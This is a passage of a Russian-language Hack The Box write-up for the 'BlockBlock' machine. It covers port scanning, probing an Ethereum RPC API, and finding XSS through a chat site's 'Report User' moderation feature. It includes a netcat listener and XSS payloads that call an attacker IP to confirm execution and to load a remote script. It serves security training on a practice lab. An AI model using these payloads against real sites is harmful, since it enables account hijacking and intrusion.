HTB BlockBlock. Повышаем привилегии в Arch Linux через менеджер пакетов

Содержание статьи

• Разведка
• Сканирование портов
• Точка входа
• Точка опоры
• XSS
• API
• Продвижение
• Локальное повышение привилегий

Се­год­ня я покажу, как мож­но повысить пра­ва в Arch Linux путем соз­дания собс­твен­ного пакета pacman. Но преж­де чем доберем­ся до ОС, нам пред­сто­ит про­экс­плу­ати­ровать XSS на сай­те и вык­расть при­ват­ные дан­ные через API Ethereum, исполь­зуя Forge — ПО для про­вер­ки смарт‑кон­трак­тов.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине BlockBlock с учеб­ной пло­щад­ки Hack The Box. Уро­вень задания — слож­ный.

warning

Под­клю­чать­ся к машинам с HTB рекомен­дует­ся с при­мене­нием средств ано­ними­зации и вир­туали­зации. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts:

10.10.11.43 blockblock.htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:

#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '' ',' | sed s/,$//)nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Ре­зуль­тат работы скрип­та

Ска­нер нашел три откры­тых пор­та:

• 22 — служ­ба OpenSSH 9.7;
• пор­ты 80 и 8545 — веб‑сер­вер Werkzeug.

Смот­рим оба пор­та веб‑сер­вера. На 80-м работа­ет какой‑то децен­тра­лизо­ван­ный чат, а порт 8545 вер­нул ошиб­ку.

Глав­ная стра­ница сай­та на пор­те 80

Ошиб­ка на пор­те 8545 

Точка входа

На сай­те с чатом есть воз­можность регис­тра­ции и авто­риза­ции. Авто­ризо­ван­ному поль­зовате­лю, как пра­вило, дос­тупно боль­ше информа­ции, поэто­му соз­дадим свою учет­ку. На глав­ной стра­нице нас встре­чает бот, а так­же ссыл­ка на смарт‑кон­трак­ты.

Глав­ная стра­ница авто­ризо­ван­ного поль­зовате­ля

Ссыл­ка на смарт‑кон­трак­ты

По ссыл­ке дос­тупно содер­жимое фай­лов Chat.sol и Database.sol.

Со­дер­жимое фай­лов

Про­верим исто­рию зап­росов в Burp History. Хотя мы работа­ли толь­ко на одном сай­те, в исто­рии есть POST-зап­рос на порт 8545.

POST-зап­рос на порт 8545

В зап­росе переда­ются дан­ные, в которых мож­но выделить стро­ку‑иден­тифика­тор eth_blockNumber. Нем­ного погуг­лив, находим справ­ку по API Ethereum.

Ин­форма­ция об API eth_blockNumber

Поп­робу­ем выпол­нить зап­рос к сер­вису и получить акка­унты через API eth_accounts. Одна­ко в отве­те сер­вера получа­ем ошиб­ку, натал­кива­ющую на мысль о необ­ходимос­ти авто­риза­ции.

Зап­рос к API eth_accounts

Вер­немся к боту и обра­тим вни­мание на кноп­ку Report User. Вво­дим любую стро­ку и получа­ем сооб­щение, что наш ввод отправ­лен модера­тору.

Ре­зуль­тат фун­кции Report User

Со­обще­ние на сай­те

Сра­зу про­верим наличие XSS. Для это­го откры­ваем лис­тенер (nc -nlvp 8000) и отправ­ляем наг­рузку, которая пос­тучит­ся на откры­тый порт. Через нес­коль­ко секунд в логах лис­тенера видим зап­рос, а зна­чит, XSS при­сутс­тву­ет.

<img src=x onerror="fetch('http://10.10.16.89:8000/test_xss')" />

Ло­ги лис­тенера 

Точка опоры

XSS

Те­перь сде­лаем наг­рузку, которая будет ска­чивать с нашего сер­вера файл с кодом на JavaScript и выпол­нять его.

var scrpt = document.createElement('script');scrpt.setAttribute('src','http://10.10.16.89:8000/xss.js');document.head.appendChild(scrpt);

Источник: xakep.ru